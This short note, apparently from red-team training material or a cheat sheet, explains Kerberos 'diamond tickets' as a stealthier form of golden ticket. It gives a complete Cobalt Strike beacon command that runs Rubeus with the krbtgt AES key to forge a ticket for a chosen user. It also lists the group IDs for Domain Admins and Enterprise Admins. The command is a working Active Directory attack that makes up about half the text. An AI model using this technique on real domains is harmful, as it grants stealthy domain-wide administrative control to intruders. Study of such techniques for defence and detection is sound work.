A diamond ticket is a stealthier variant of a golden ticket, in that it is not created from nothing, but instead modified from an existing TGT. It’s harder to detect a diamond ticket since it is a legitimately issued ticket, just with modified content.
To generate a diamond ticket with Rubeus:
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe diamond /tgtdeleg /ticketuser:[target-user] /ticketuserid:[target-user-rid] /groups:[group-rids] /krbkey:[krbtgt-aes256-hash-b64] /nowrap/tgtdeleg: obtain ticket for current user through GSS-API and faked delegation; it doesn’t matter what the current user is: no elevation is needed to obtain this ticket, and the username will be overwritten anyway- Use 512 for
/groupsfor Domain Admins group, 519 for Enterprise Admins group.